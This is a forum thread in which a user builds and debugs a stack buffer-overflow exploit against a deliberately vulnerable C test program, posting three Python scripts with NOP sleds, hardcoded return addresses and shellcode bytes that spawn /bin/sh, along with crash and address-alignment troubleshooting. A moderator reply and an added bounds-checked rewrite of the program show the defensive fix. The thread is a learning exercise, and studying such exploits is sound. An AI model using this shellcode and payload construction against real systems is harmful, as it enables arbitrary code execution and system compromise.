Exploiting Buffer Overflows Using Python


Post by Th3_M4d_H4tt3r on Sat Jun 22, 2013 2:40 am

Alright, I need a little help with this one; here is my test program (C):
Code:
#include <string.h>

void main(int argc, char *argv[]) {
  char buffer[100];

  if (argc > 1)
    strcpy(buffer,argv[1]);   /* unbounded copy into a 100-byte stack buffer */
}

I enabled stack execution (gcc -fno-stack-protector)
I found my memory address (bffff500)
here is my exploit program:
Code:
buffsize = 104   #the buffer size after the return address is overwritten

shellcode ="\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68"

ret = "\xbf\xff\xf5\x00" #bffff500

nop = "\x90"

buffsize = buffsize - len(shellcode)+4

exploit = nop * buffsize+shellcode+ret

print exploit

I used it like this:
./test `python exploit.py`

but when I execute it I get no output, what am I doing wrong?
oh BTW, the shellcode is from http://shell-storm.org/shellcode/files/ ... de-698.php

off-topic: my cat is snoring right now!
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
Th3_M4d_H4tt3r
Experienced User
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am


Re: Exploiting Buffer Overflows Using Python

Post by centip3de on Sat Jun 22, 2013 12:55 pm

Buffer overflows are fickle mistresses that require some fine tuning and testing to get just right. I'd recommend you test this through GDB first (loading the program, then doing: python -c 'print "A"*104', making sure it overwrites the EIP, etc.). If that's all good, and you get it to work, then make a script, not before.

Also, your C program should always be "int main(...)", and your main function should always return 0!
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
centip3de
Moderator
Posts: 1426
Joined: Fri Aug 20, 2010 5:46 pm
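As an added example (not code from either poster), here is the test program from the first post rewritten with a bounds-checked copy, which is the fix for the overflow the thread is about and also takes up centip3de's point about `int main` returning 0. The `try_copy_len` helper and its run of 'A' bytes are constructed here for demonstration and are not part of the original program.

```c
#include <stdio.h>
#include <string.h>

/* The posted program does strcpy(buffer, argv[1]) into char buffer[100] with
 * no length check, so any argument of 100 bytes or more (the thread's 104-byte
 * payload included) writes past the array and over the saved return address. */
#define BUF_SIZE 100

/* Copy src into dst only if it fits, NUL terminator included.
 * Returns bytes copied (excluding NUL), or -1 (dst left empty) when
 * src would overflow dst. Rejecting is preferred to silent truncation. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        if (dst_size > 0)
            dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);   /* bounded: at most dst_size bytes */
    return (int)len;
}

/* Constructed input: an argument of `len` 'A' bytes, like the "A"*104 test
 * suggested in the thread. Returns copy_arg's result, or -2 if a "successful"
 * copy is not byte-exact. Lengths above 255 are clamped for the demo. */
int try_copy_len(size_t len)
{
    char arg[256], buffer[BUF_SIZE];
    int rc;
    if (len > sizeof arg - 1)
        len = sizeof arg - 1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = copy_arg(buffer, sizeof buffer, arg);
    if (rc >= 0 && (strlen(buffer) != len || memcmp(buffer, arg, len) != 0))
        return -2;
    return rc;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc > 1 && copy_arg(buffer, sizeof buffer, argv[1]) < 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;   /* int main returning 0, as centip3de's reply says */
}
```

Running it with the 104-byte argument from the thread now produces an error exit instead of a corrupted stack; 99 bytes is the longest argument that still fits.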


Re: Exploiting Buffer Overflows Using Python

Post by Th3_M4d_H4tt3r on Sat Jun 22, 2013 2:08 pm

I have overwritten the return address but I keep getting a SIGILL

Illegal instruction (core dumped)

here is my new exploit code (ubuntu):
Code:
buffsize = 100   #the buffer size

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

ret = '\xbf\xff\xf5\x00' #bffff500

nop = '\x90'

buffsize = buffsize - len(shellcode)+6

exploit = nop * buffsize+shellcode+ret*2

print exploit


here is my stack trace:
(gdb) x/99ga $esp


Any ideas?

-- Mon Jun 24, 2013 4:19 pm --

Alright, I fixed up my code a little, I am much, much closer!

I am having problems with overwriting the return address, it is off by one byte.
here is my exploit code (python):
Code:
buffsize=100

shellcode="\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"

buffsize=buffsize - len(shellcode)+12

ret="\x00\xf5\xff\xbf"      #0xbffff500

print "\x90"*buffsize+shellcode+ret


but when I run the exploit on my vulnerable program the return address is:
0x00bffff5
but it should be:
0xbffff500

how can I achieve this?
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
Th3_M4d_H4tt3r
Experienced User
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
